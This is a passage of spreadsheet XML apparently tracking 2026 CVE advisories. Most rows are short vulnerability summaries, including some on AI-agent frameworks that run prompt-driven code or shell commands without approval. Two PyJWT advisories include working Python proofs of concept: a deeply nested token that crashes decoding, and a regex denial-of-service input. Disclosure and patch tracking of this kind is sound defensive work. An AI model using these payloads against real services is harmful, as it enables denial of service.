      <c r="I609" s="5" t="inlineStr"/>
      <c r="J609" s="5" t="inlineStr">
        <is>
          <t>pypi</t>
        </is>
      </c>
      <c r="K609" s="5" t="inlineStr"/>
      <c r="L609" s="5" t="inlineStr">
        <is>
          <t>PyPI:pyjwt</t>
        </is>
      </c>
      <c r="M609" s="5" t="inlineStr">
        <is>
          <t>2.15.0</t>
        </is>
      </c>
      <c r="N609" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O609" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P609" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q609" s="5" t="inlineStr"/>
      <c r="R609" s="5" t="inlineStr"/>
      <c r="S609" s="5" t="inlineStr">
        <is>
          <t>## Summary
`PyJWKClient.get_signing_key_from_jwt(token)` — the first step of the JWKS
verification flow documented in `docs/usage.rst` — must decode a token's
payload before its signature can be checked, via
`jwt.api_jwt.decode_complete(token, options={"verify_signature": False})`.
That call parses the payload with `json.loads` in `PyJWT._decode_payload`
(`jwt/api_jwt.py:297-300`), whose `except` clause catches only `ValueError`.
A payload that is valid JSON but nested ~20,000 levels deep makes
`json.loads` raise `RecursionError`, which is **not** a `ValueError` and
escapes as a raw, undocumented exception type — not `DecodeError`,
`InvalidTokenError`, or `PyJWTError`, so every documented error-handling
pattern in `docs/usage.rst` misses it.
The token needs no valid signature and no network access — the crash
happens during payload parsing, before the `kid` is even looked up. A
single unauthenticated ~50KB request crashes the caller's auth handler
(HTTP 500 / dead worker), repeatably. The same path is reachable through
plain `jwt.decode(token, options={"verify_signature": False})` too.
Notably, this project already fixed the **identical** bug class for the
JWS **header** path — `PyJWS._load` catches `(ValueError, RecursionError)`
and wraps it in `DecodeError` (`jwt/api_jws.py:360-361`), and
`CHANGELOG.rst` (v2.14.0, "Security") states "Handle deeply nested and
malformed JWS/JWK input without uncaught recursion errors." The payload
path — the one part of a forged token an unauthenticated attacker fully
controls — was left catching `ValueError` alone, so that security fix does
not fully hold.
A second, related instance: `PyJWKClient.fetch_data` (`jwt/jwks_client.py:168`)
parses a JWKS endpoint's response with `json.load(response)` inside a
`try` that only catches `(URLError, TimeoutError, http.client.HTTPException)`
— a deeply-nested JSON response from a JWKS endpoint raises the same raw
`RecursionError`, uncaught entirely (worse than the payload path, which at
least caught plain `ValueError`).
**Affected versions:** confirmed present in the current release, 2.14.0,
and on the current `master` branch (commit `4adcd02722f5011c60079d3978dfc167b9a8eaa5`).
## Reproduction
```python
import base64, json, jwt
def b64url(b):
    return base64.urlsafe_b64encode(b).rstrip(b"=")
header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
payload = b64url(b"[" * 20_000 + b"]" * 20_000)
token = (header + b"." + payload + b"." + b64url(b"forged-sig")).decode()
jwt.decode(token, options={"verify_signature": False})
# raises: RecursionError (not DecodeError/InvalidTokenError/PyJWTError)
```
Control: the same deeply-nested structure moved into the token's **header**
instead of its payload is correctly converted to `jwt.DecodeError` by the
already-hardened `jwt/api_jws.py:360` — confirming the payload path is
specifically the missed half of the v2.14.0 hardening, not a general gap.
## Impact assessment
Unauthenticated denial-of-service via unhandled exception on an auth path.
Not an auth bypass — rated medium. With signature verification enabled,
this parse runs after `_verify_signature`, so only the pre-verification
paths (`get_signing_key_from_jwt`, explicit `verify_signature=False`) are
attacker-reachable pre-auth; the JWKS-endpoint variant requires control of
(or a MITM on) the configured JWKS endpoint rather than being reachable
from an arbitrary client token.
## Suggested fix
In `jwt/api_jwt.py:299`, change `except ValueError as e:` to
`except (ValueError, RecursionError) as e:`, mirroring
`jwt/api_jws.py:360` exactly. In `jwt/jwks_client.py`, add the same
`(ValueError, RecursionError)` handling around `json.load(response)` in
`fetch_data`, raising `PyJWKClientError` (consistent with the method's
existing documented error contract). A patch implementing both, verified
against the full test suite (457 passed, 4 skipped — pre-existing,
environment-related) and against the reproduction above (now correctly
raises `DecodeError`), is attached (`fix.patch`).
## Discovery method
Found and verified using `scopegrep` (https://github.com/not-ekalabya/scopegrep)
— a semantic code-retrieval tool that surfaces every other call site of a
symbol alongside relevance-ranked results, which is what surfaced the
already-hardened header path as the direct comparison here — paired with
an LLM coding agent (GLM-5.3) run as an open-ended security review of this
repository. Independently reproduced against the exact commit above before
this report was written. Happy to share the full session transcript on
request.
## Disclosure status
Not shared with any other party or published. Submitting through this
private channel per the project's stated security policy; no planned
public/conference disclosure ahead of a coordinated timeline.
---
## Maintainer triage update (2026-09-22)
### Confirmed finding and scope
We confirmed that an attacker-controlled recursively nested JWT payload can cause a raw Python `RecursionError` to escape PyJWT at PyJWT 2.14.0 and the tested current source. The confirmed in-scope paths are direct decoding with `verify_signature=False` and `PyJWKClient.get_signing_key_from_jwt`, where payload parsing occurs before key lookup.
The demonstrated impact is limited to an uncaught exception for the affected call, which may surface as an application HTTP 500 when the application does not catch it. Testing did not demonstrate a worker or process crash, persistent resource exhaustion, resource amplification, authentication bypass, or confidentiality or integrity impact.
The separate JWKS-response subclaim is out of scope under the policy boundary that requires the application to trust its configured JWKS source and transport. The confirmed payload finding is not a duplicate of the earlier protected-header parser finding: it occurs in a distinct payload parsing path that remained affected after the earlier header-only fix.
### Version and remediation status
Historical testing reproduced the confirmed payload behavior in all 20 official supported PyJWT 2.x releases from 2.0.0a1 through 2.14.0, inclusive. Unsupported PyJWT 1.7.1 also reproduces the behavior, but it is excluded from the advisory range under the supported-2.x policy. No supported unaffected release and no patched release exists. The exact evidence is `/Users/jpadilla/.codex/security-advisories/pyjwt/GHSA-42vr-xj54-vc7v-historical-range-20260922.md` (SHA-256 `c48f1ac35641e9382d53e6a879a71ad9a8fb4432bbe871f2b8330f8d166a2d81`) and `/Users/jpadilla/.codex/security-advisories/pyjwt/historical-range-42vr-20260922/historical-range-results.json` (SHA-256 `324997f231561bf6da39b8f9d1e272f69bfde8871a7863f5cb7b70e22e91f076`). The evidence-backed supported affected range is `&gt;= 2.0.0a1, &lt;= 2.14.0`.
Historical range verification is complete. A local fix commit exists and has passed independent review and the complete local CI suite, but it has not been merged into `master` or released. Consequently, `patched_versions` remains empty and this advisory remains in `triage`. The remaining next step is a maintainer decision on remediation and merge. After a fix lands in `master` and is released, `patched_versions` and advisory lifecycle can be updated in a separate approved batch.
---
## Maintainer remediation update (2026-09-23)
The confirmed payload-parser finding has been fixed on `master`. Commit
`5fde08a6cf906aa7698de2d6391d88b73006b17b` converts a recursive
payload parse failure to the expected `DecodeError`; commit
`9bc06658f875b9b40091539140bbbdc4639161c3` makes the regression tests
deterministic across supported Python versions. This update supersedes the
2026-09-22 remediation-status statement that the fix had not landed.
The original pre-verification payload reproducer and the
`PyJWKClient.get_signing_key_from_jwt` path were covered by regression tests.
The exact landed tree passed the full 39-environment local tox matrix and
GitHub CI for commit `9bc06658f875b9b40091539140bbbdc4639161c3` passed
all 25 jobs, including Ubuntu Python 3.14 and 3.15. The demonstrated impact
remains an uncaught request-level exception in affected releases; there is
still no evidence of process termination, persistent resource exhaustion,
authentication bypass, or confidentiality or integrity impact.
The supported affected range remains `&gt;= 2.0.0a1, &lt;= 2.14.0`. The latest
released version is 2.14.0, which predates these commits; no released
patched version exists yet, so `patched_versions` remains unset. CVSS v3.1
5.3 (Medium) and CWE-248 remain unchanged. The advisory may now move from
triage to private draft. The next lifecycle step is a new supported 2.x
release containing the fix, followed by separately approved patched-version
and publication updates after release verification.
---
## Maintainer release update (2026-09-23)
PyJWT 2.15.0 is the first released version containing the payload-parser fix. Its GitHub release tag points to commit `1d41a6478e1562e68ff667fcd703356acf085f68`, which includes fix commit `5fde08a6cf906aa7698de2d6391d88b73006b17b` and deterministic regression-test commit `9bc06658f875b9b40091539140bbbdc4639161c3`. PyPI published both the wheel and source distribution from that release commit through the successful production workflow at https://github.com/jpadilla/pyjwt/actions/runs/35891602963.
The published PyPI wheel (`pyjwt-2.15.0-py3-none-any.whl`, SHA-256 `7a3742debf6b879e912dbb9819ceec1594be812452b78c5f2e2dfc56564954f8`) was checked directly: the deeply nested unsigned payload now raises `DecodeError`, while an ordinary unsigned payload still decodes. The supported affected range remains `&gt;= 2.0.0a1, &lt;= 2.14.0`; the patched version is `2.15.0`. Earlier statements in this advisory that no released patched version exists are superseded by this update.
The confirmed impact remains an uncaught request-level exception in affected versions, not a demonstrated process crash or authentication bypass. The separate JWKS-response subclaim remains outside this advisory's confirmed PyJWT-owned scope.</t>
        </is>
      </c>
      <c r="T609" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101918</t>
        </is>
      </c>
    </row>
    <row r="610">
      <c r="A610" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B610" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C610" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102270</t>
        </is>
      </c>
      <c r="D610" s="5" t="inlineStr"/>
      <c r="E610" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F610" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G610" s="5" t="inlineStr"/>
      <c r="H610" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I610" s="5" t="inlineStr"/>
      <c r="J610" s="5" t="inlineStr">
        <is>
          <t>pypi</t>
        </is>
      </c>
      <c r="K610" s="5" t="inlineStr"/>
      <c r="L610" s="5" t="inlineStr">
        <is>
          <t>PyPI:pyjwt</t>
        </is>
      </c>
      <c r="M610" s="5" t="inlineStr">
        <is>
          <t>2.14.0</t>
        </is>
      </c>
      <c r="N610" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O610" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P610" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q610" s="5" t="inlineStr"/>
      <c r="R610" s="5" t="inlineStr"/>
      <c r="S610" s="5" t="inlineStr">
        <is>
          <t>### Summary
There is a Re-DoS vulnerability in the `is_pem_format` function which results in a intesive CPU usage if an attacker is been able to provide a custom certificate.
### Details
The problem is that the lazy quantifier `.+?` will always first try to match as little as possible until it finds a `---- END`. Normally this means the complexity of this should be O(N). However, by providing an input which consists only of `----BEGIN CERTIFICATE-----` lines and no `---- END` line, the regex algorithm will first try to match the first line and then, with the lazy quantifier, all the lines until the end O(N), which then fails since it is unable to find a `---- END` line. It will then jump to the next line, resulting in N re-scans of the whole string, which means the complexity basically results in O(N²). 
### PoC
```python
import time
import re
BEGIN_LINE = b"-----BEGIN CERTIFICATE-----\n"
_PEMS = {
    b"CERTIFICATE",
    b"TRUSTED CERTIFICATE",
    b"PRIVATE KEY",
    b"PUBLIC KEY",
    b"ENCRYPTED PRIVATE KEY",
    b"OPENSSH PRIVATE KEY",
    b"DSA PRIVATE KEY",
    b"RSA PRIVATE KEY",
    b"RSA PUBLIC KEY",
    b"EC PRIVATE KEY",
    b"DH PARAMETERS",
    b"NEW CERTIFICATE REQUEST",
    b"CERTIFICATE REQUEST",
    b"SSH2 PUBLIC KEY",
    b"SSH2 ENCRYPTED PRIVATE KEY",
    b"X509 CRL",
}
_PEM_RE = re.compile(
    b"----[- ]BEGIN ("
    + b"|".join(_PEMS)
    + b""")[- ]----\r?
.+?\r?
----[- ]END \\1[- ]----\r?\n?""",
    re.DOTALL,
)
def is_pem_format(key: bytes) -&gt; bool:
    return bool(_PEM_RE.search(key))
def make_payload(num_headers: int) -&gt; bytes:
    return BEGIN_LINE * num_headers
def measure(num_headers: int) -&gt; float:
    payload = make_payload(num_headers)
    start = time.perf_counter()
    is_pem_format(payload)  # returns False, but burns CPU getting there
    elapsed = time.perf_counter() - start
    print(
        f"  headers={num_headers:&gt;4}  size={len(payload)//1024:&gt;3} KB"
        f"   time={elapsed*1000:&gt;7.1f} ms"
    )
    return elapsed
for n in (1000, 2000, 4000, 8000):
    measure(n)
```
### Impact
The attacker could use extensive resources, which could make the resource (e.g. a web server) unavailable.
### Maintainer update (2026-09-10): 
We reproduced the reported quadratic regex behavior on malformed PEM-like input: doubling repeated BEGIN lines produced approximately fourfold runtime growth, while equal-sized ordinary input remained negligible. The affected path is reached when an application passes attacker-controlled key or certificate bytes to PyJWT’s key preparation, and the impact is resource exhaustion. The fix is on master in commit 8b4e233a22206b34ec1186e912e75c0b2396ac07; it replaces the backtracking PEM regex with a bounded marker scan. Fresh Astra/max review accepted the fix and confirmed malformed, mixed-label, and valid-input controls. This is a distinct ReDoS finding from the later PEM-recognition report that shares the implementation commit. The fix has not yet shipped in a released PyJWT 2.x version, so this advisory is being moved to draft and remains unpublished pending release.
## Maintainer update — 2026-09-11
The verified fix for this advisory is included in PyJWT 2.14.0, released on 2026-09-11 and available on PyPI. PyJWT 2.14.0 is the first release containing the fix. This advisory is now published with the release recorded as the patched version.</t>
        </is>
      </c>
      <c r="T610" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102270</t>
        </is>
      </c>
    </row>
    <row r="611">
      <c r="A611" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B611" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C611" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103500</t>
        </is>
      </c>
      <c r="D611" s="5" t="inlineStr"/>
      <c r="E611" s="5" t="inlineStr"/>
      <c r="F611" s="5" t="inlineStr"/>
      <c r="G611" s="5" t="inlineStr"/>
      <c r="H611" s="5" t="inlineStr"/>
      <c r="I611" s="5" t="inlineStr"/>
      <c r="J611" s="5" t="inlineStr"/>
      <c r="K611" s="5" t="inlineStr"/>
      <c r="L611" s="5" t="inlineStr"/>
      <c r="M611" s="5" t="inlineStr"/>
      <c r="N611" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O611" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P611" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q611" s="5" t="inlineStr"/>
      <c r="R611" s="5" t="inlineStr"/>
      <c r="S611" s="5" t="inlineStr">
        <is>
          <t>An attacker could cause a heap buffer overflow by getting a user to open an email that is greater than or equal to 2GB in size. This vulnerability was fixed in Thunderbird 157, Thunderbird 140.17, and Thunderbird 153.4.</t>
        </is>
      </c>
      <c r="T611" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103500</t>
        </is>
      </c>
    </row>
    <row r="612">
      <c r="A612" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B612" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C612" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19253</t>
        </is>
      </c>
      <c r="D612" s="5" t="inlineStr"/>
      <c r="E612" s="5" t="inlineStr"/>
      <c r="F612" s="5" t="inlineStr"/>
      <c r="G612" s="5" t="inlineStr"/>
      <c r="H612" s="5" t="inlineStr"/>
      <c r="I612" s="5" t="inlineStr"/>
      <c r="J612" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K612" s="5" t="inlineStr"/>
      <c r="L612" s="5" t="inlineStr"/>
      <c r="M612" s="5" t="inlineStr"/>
      <c r="N612" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O612" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P612" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q612" s="5" t="inlineStr"/>
      <c r="R612" s="5" t="inlineStr"/>
      <c r="S612" s="5" t="inlineStr">
        <is>
          <t>The Cache Enabler WordPress plugin before 1.8.17 does not validate a URL before using it to build a filesystem path in its cache purge routine, and does not confine the resulting deletion to the cache directory, allowing unauthenticated users to delete arbitrary files and directories on sites where another installed Cache Enabler WordPress plugin before 1.8.17 or  passes a request-derived URL to its public cache-clearing hook.</t>
        </is>
      </c>
      <c r="T612" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19253</t>
        </is>
      </c>
    </row>
    <row r="613">
      <c r="A613" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B613" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C613" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51852</t>
        </is>
      </c>
      <c r="D613" s="5" t="inlineStr"/>
      <c r="E613" s="5" t="inlineStr"/>
      <c r="F613" s="5" t="inlineStr"/>
      <c r="G613" s="5" t="inlineStr"/>
      <c r="H613" s="5" t="inlineStr"/>
      <c r="I613" s="5" t="inlineStr"/>
      <c r="J613" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K613" s="5" t="inlineStr"/>
      <c r="L613" s="5" t="inlineStr"/>
      <c r="M613" s="5" t="inlineStr"/>
      <c r="N613" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O613" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P613" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q613" s="5" t="inlineStr"/>
      <c r="R613" s="5" t="inlineStr"/>
      <c r="S613" s="5" t="inlineStr">
        <is>
          <t>agent-zero 1.7, 1.8, 1.9, and 1.10 is vulnerable to Directory Traversal in python/helpers/file_browser.py:FileBrowser.save_file_b64. The save_file_b64 method accepts user-controlled file paths without normalization or validation, allowing path traversal attacks.</t>
        </is>
      </c>
      <c r="T613" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51852</t>
        </is>
      </c>
    </row>
    <row r="614">
      <c r="A614" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B614" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C614" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51853</t>
        </is>
      </c>
      <c r="D614" s="5" t="inlineStr"/>
      <c r="E614" s="5" t="inlineStr"/>
      <c r="F614" s="5" t="inlineStr"/>
      <c r="G614" s="5" t="inlineStr"/>
      <c r="H614" s="5" t="inlineStr"/>
      <c r="I614" s="5" t="inlineStr"/>
      <c r="J614" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K614" s="5" t="inlineStr"/>
      <c r="L614" s="5" t="inlineStr"/>
      <c r="M614" s="5" t="inlineStr"/>
      <c r="N614" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O614" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P614" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q614" s="5" t="inlineStr"/>
      <c r="R614" s="5" t="inlineStr"/>
      <c r="S614" s="5" t="inlineStr">
        <is>
          <t>agent-zero 1.7, 1.8, 1.9, and 1.10 is vulnerable to Directory Traversal in python/helpers/file_browser.py:FileBrowser.__init__. The FileBrowser class initializes with the host root directory as the workspace, allowing the agent to access any file on the system without restriction.</t>
        </is>
      </c>
      <c r="T614" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51853</t>
        </is>
      </c>
    </row>
    <row r="615">
      <c r="A615" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B615" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C615" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51856</t>
        </is>
      </c>
      <c r="D615" s="5" t="inlineStr"/>
      <c r="E615" s="5" t="inlineStr"/>
      <c r="F615" s="5" t="inlineStr"/>
      <c r="G615" s="5" t="inlineStr"/>
      <c r="H615" s="5" t="inlineStr"/>
      <c r="I615" s="5" t="inlineStr"/>
      <c r="J615" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K615" s="5" t="inlineStr"/>
      <c r="L615" s="5" t="inlineStr"/>
      <c r="M615" s="5" t="inlineStr"/>
      <c r="N615" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O615" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P615" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q615" s="5" t="inlineStr"/>
      <c r="R615" s="5" t="inlineStr"/>
      <c r="S615" s="5" t="inlineStr">
        <is>
          <t>In agentscope 1.0.18, 1.0.19, and 1.0.19 when the RealtimeAgent session exposes execute_python_code as an available tool, a remote WebSocket user can prompt the agent to call that tool and run Python code in the service environment. In the validated path, RealtimeAgent._acting forwards the model-produced tool call to Toolkit.call_tool_function, which invokes execute_python_code without an additional approval or isolation boundary on that path.</t>
        </is>
      </c>
      <c r="T615" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51856</t>
        </is>
      </c>
    </row>
    <row r="616">
      <c r="A616" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B616" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C616" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51857</t>
        </is>
      </c>
      <c r="D616" s="5" t="inlineStr"/>
      <c r="E616" s="5" t="inlineStr"/>
      <c r="F616" s="5" t="inlineStr"/>
      <c r="G616" s="5" t="inlineStr"/>
      <c r="H616" s="5" t="inlineStr"/>
      <c r="I616" s="5" t="inlineStr"/>
      <c r="J616" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K616" s="5" t="inlineStr"/>
      <c r="L616" s="5" t="inlineStr"/>
      <c r="M616" s="5" t="inlineStr"/>
      <c r="N616" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O616" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P616" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q616" s="5" t="inlineStr"/>
      <c r="R616" s="5" t="inlineStr"/>
      <c r="S616" s="5" t="inlineStr">
        <is>
          <t>In camel-ai camel 0.2.91a1, v0.2.91a2 and v0.2.91a3, CodeExecutionToolkit can run model-produced Python code through SubprocessInterpreter without an approval boundary.</t>
        </is>
      </c>
      <c r="T616" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51857</t>
        </is>
      </c>
    </row>
    <row r="617">
      <c r="A617" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B617" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C617" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51858</t>
        </is>
      </c>
      <c r="D617" s="5" t="inlineStr"/>
      <c r="E617" s="5" t="inlineStr"/>
      <c r="F617" s="5" t="inlineStr"/>
      <c r="G617" s="5" t="inlineStr"/>
      <c r="H617" s="5" t="inlineStr"/>
      <c r="I617" s="5" t="inlineStr"/>
      <c r="J617" s="5" t="inlineStr"/>
      <c r="K617" s="5" t="inlineStr"/>
      <c r="L617" s="5" t="inlineStr"/>
      <c r="M617" s="5" t="inlineStr"/>
      <c r="N617" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O617" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P617" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q617" s="5" t="inlineStr"/>
      <c r="R617" s="5" t="inlineStr"/>
      <c r="S617" s="5" t="inlineStr">
        <is>
          <t>In camel-ai camel 0.2.91a1, v0.2.91a2 and v0.2.91a3, TerminalToolkit.shell_exec allows prompt-driven shell command execution without an approval boundary.</t>
        </is>
      </c>
      <c r="T617" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51858</t>
        </is>
      </c>
    </row>
    <row r="618">
      <c r="A618" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B618" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C618" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51859</t>
        </is>
      </c>
      <c r="D618" s="5" t="inlineStr"/>
      <c r="E618" s="5" t="inlineStr"/>
      <c r="F618" s="5" t="inlineStr"/>
      <c r="G618" s="5" t="inlineStr"/>
      <c r="H618" s="5" t="inlineStr"/>
      <c r="I618" s="5" t="inlineStr"/>
      <c r="J618" s="5" t="inlineStr"/>
      <c r="K618" s="5" t="inlineStr"/>
      <c r="L618" s="5" t="inlineStr"/>
      <c r="M618" s="5" t="inlineStr"/>
      <c r="N618" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O618" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P618" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q618" s="5" t="inlineStr"/>
      <c r="R618" s="5" t="inlineStr"/>
      <c r="S618" s="5" t="inlineStr">
        <is>
          <t>bisheng 2.3.0, 2.4.0, and 2.4.0-beta1 is vulnerable to directory traversal in save_download_file (src/backend/bisheng/core/cache/utils.py:290).</t>
        </is>
      </c>
      <c r="T618" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51859</t>
        </is>
      </c>
    </row>
    <row r="619">
      <c r="A619" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B619" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C619" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51860</t>
        </is>
      </c>
      <c r="D619" s="5" t="inlineStr"/>
      <c r="E619" s="5" t="inlineStr"/>
      <c r="F619" s="5" t="inlineStr"/>
      <c r="G619" s="5" t="inlineStr"/>
      <c r="H619" s="5" t="inlineStr"/>
      <c r="I619" s="5" t="inlineStr"/>
      <c r="J619" s="5" t="inlineStr"/>
      <c r="K619" s="5" t="inlineStr"/>
      <c r="L619" s="5" t="inlineStr"/>
      <c r="M619" s="5" t="inlineStr"/>
      <c r="N619" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O619" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P619" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q619" s="5" t="inlineStr"/>
      <c r="R619" s="5" t="inlineStr"/>
      <c r="S619" s="5" t="inlineStr">
        <is>
          <t>bisheng 2.3.0, 2.4.0, and 2.4.0-beta1 is vulnerable to Directory Traversal in src/backend/bisheng/linsight/domain/task_exec.py.</t>
        </is>
      </c>
      <c r="T619" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51860</t>
        </is>
      </c>
    </row>
    <row r="620">
      <c r="A620" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B620" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C620" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51861</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2026-09-30</t>
        </is>
      </c>
      <c r="P620" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q620" s="5" t="inlineStr"/>
      <c r="R620" s="5" t="inlineStr"/>
      <c r="S620" s="5" t="inlineStr">
        <is>
          <t>bisheng 2.3.0, 2.4.0, and 2.4.0-beta1 is vulnerable to Code Injection in src/backend/bisheng/api/v1/validate.py.</t>
        </is>
      </c>
      <c r="T620" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51861</t>
        </is>
      </c>
    </row>
    <row r="621">
      <c r="A621" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B621" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C621" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51862</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2026-09-30</t>
        </is>
      </c>
      <c r="P621" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q621" s="5" t="inlineStr"/>
      <c r="R621" s="5" t="inlineStr"/>
      <c r="S621" s="5" t="inlineStr">
        <is>
          <t>DB-GPT 0.8.0 contains directory traversal in skill_upload (packages/dbgpt-app/src/dbgpt_app/openapi/api_v1/agentic_data_api.py:40). A remote attacker can use the validated exploitation path to write files outside the intended workspace or storage boundary.</t>
        </is>
      </c>
      <c r="T621" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51862</t>
        </is>
      </c>
    </row>
    <row r="622">
      <c r="A622" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
